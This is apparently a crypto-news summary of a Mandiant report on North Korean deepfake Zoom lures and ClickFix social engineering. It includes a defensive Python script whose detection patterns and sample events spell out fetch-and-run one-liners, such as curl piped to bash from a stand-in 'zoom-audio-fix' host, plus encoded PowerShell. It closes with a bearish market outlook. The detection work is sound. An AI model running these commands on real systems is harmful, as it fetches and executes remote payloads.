Google/Mandiant: North Korean Hackers Using AI Deepfakes to Target Crypto and DeFi
Google Cloud’s Mandiant warns that the North Korean–linked threat actor UNC1069 (also tracked as CryptoCore) is combining AI-generated deepfakes, spoofed Zoom meetings, compromised messaging accounts and ClickFix social engineering to target cryptocurrency firms, developers and venture capital personnel. In a fintech intrusion Mandiant investigated, a message from a compromised Telegram account led to a Calendly invite for a fake Zoom call; during the call the attackers displayed an AI deepfake of a known crypto CEO and told the victim to run “troubleshooting” commands, which deployed seven malware families that harvested credentials, session tokens and browser data. Chainalysis figures cited in the reporting put DPRK-linked crypto theft at about $2.02 billion in 2025, a 51% year-over-year increase, bringing cumulative DPRK-related thefts to roughly $6.75 billion. Experts warn that the shift from mass phishing to highly targeted, AI-enabled social engineering puts trusted digital identities at risk, turning calendar invites, video calls and routine communications into attack vectors; a meeting host who asks participants to paste commands into a terminal or Run dialog to “fix” audio or video should be treated as a compromise attempt, however convincing the face on the screen. The report urges traders and firms to strengthen identity verification (for example, confirming unexpected meeting requests over a separate, known-good channel), enforce multi-factor authentication, protect session tokens and adopt phishing-resistant procedures for virtual meetings.
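The ClickFix step in the intrusion above leaves a trace on the endpoint: a user-typed one-liner that fetches or decodes a payload and hands it to a shell. The following Python triage script is an added example (not code from the report, and not Mandiant's published UNC1069 indicators) that runs generic ClickFix-style heuristics over constructed process-creation events; the hostnames, parent process names, URLs and encoded blob are invented for the example.

```python
import re
from dataclasses import dataclass

# Generic ClickFix-style indicators: the victim is talked into pasting a one-liner
# that fetches or decodes a payload and pipes it into a shell. These patterns are
# assumptions made for this example, not Mandiant's published UNC1069 indicators.
INDICATORS = {
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget|iwr|Invoke-WebRequest)\b[^|;]*\|\s*(ba|z|k)?sh\b", re.I),
    "base64_decoded_to_shell": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b", re.I),
    "encoded_powershell": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"\s-(w|windowstyle)\s+hidden\b", re.I),
    "mshta_remote": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    "osascript_shell": re.compile(r"\bosascript\b.*do shell script", re.I),
}


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, as an EDR or auditd pipeline might emit it."""
    event_id: int
    host: str
    parent: str      # process that spawned the command (terminal, Run dialog, ...)
    cmdline: str


def match_indicators(cmdline: str) -> list[str]:
    """Return the names of every indicator the command line trips (empty if none)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Long chained one-liners are typical of "paste this to fix it" instructions.
    if cmdline.count("&&") + cmdline.count(";") >= 3:
        hits.append("long_chained_oneliner")
    return hits


def scan_events(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event_id -> indicator names for every event that matched at least one."""
    flagged = {}
    for ev in events:
        hits = match_indicators(ev.cmdline)
        if hits:
            flagged[ev.event_id] = hits
    return flagged


# Constructed sample telemetry; hosts, parents, URLs and the blob are invented.
SAMPLE_EVENTS = [
    ProcessEvent(1, "dev-mac-01", "Terminal",
                 "curl -fsSL https://zoom-audio-fix.example.invalid/repair.sh | bash"),
    ProcessEvent(2, "dev-mac-01", "Terminal",
                 "echo 'ZWNobyBvaw==' | base64 -d | sh"),
    ProcessEvent(3, "vc-win-07", "explorer.exe",
                 "powershell -w hidden -EncodedCommand SQBFAFgAIAAoACkA"),
    ProcessEvent(4, "dev-mac-01", "Terminal", "git pull origin main"),
    ProcessEvent(5, "dev-mac-02", "Terminal",
                 "osascript -e 'do shell script \"curl -s https://zoom-audio-fix.example.invalid/a.sh | sh\"'"),
    ProcessEvent(6, "dev-mac-02", "Terminal", "brew upgrade && brew cleanup"),
]


if __name__ == "__main__":
    # Events 1, 2, 3 and 5 are flagged; 4 and 6 are ordinary developer activity.
    for event_id, hits in scan_events(SAMPLE_EVENTS).items():
        ev = next(e for e in SAMPLE_EVENTS if e.event_id == event_id)
        print(f"[{ev.host}] event {event_id} via {ev.parent}: {', '.join(hits)}")
        print(f"    {ev.cmdline}")
```

The heuristics are content-only, so developers who legitimately pipe an installer into a shell will trip them; route the hits to triage rather than blocking, and correlate the timestamp with calendar and meeting-client activity on the same host, since the report's distinguishing feature is that the command was typed during a video call at the “host's” request.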
Bearish
This news is bearish for crypto market sentiment and trading risk. High-profile, state-linked attacks using AI deepfakes and targeted social engineering raise counterparty and custodial risk, increasing perceived operational risk across exchanges, custody providers, venture firms and developer teams. Immediate effects: heightened risk aversion may increase sell-side pressure on affected tokens and projects, prompt short-term outflows from centralized platforms, and raise volatility in assets tied to targeted firms. Traders may reduce leverage and widen spreads on tail-risk concerns. Medium to long term: if attacks continue, market participants will price in higher operational and regulatory risk, potentially reducing capital inflows into DeFi projects and startups and increasing demand for more secure custody solutions (a partial bullish offset for security and custody service tokens). Historical parallels: prior DPRK-linked heists (e.g. Lazarus campaigns and the 2022-2023 bridge and exchange hacks) produced immediate liquidity withdrawals, temporary price drops in targeted assets, and longer-term shifts toward regulated custodians and stricter onboarding. Recommended trader actions: reduce leverage, audit counterparties, monitor announcements from exchanges and major DeFi protocols for compromised keys or token freezes, and consider hedges (stablecoins, inverse products) until systemic risk recedes.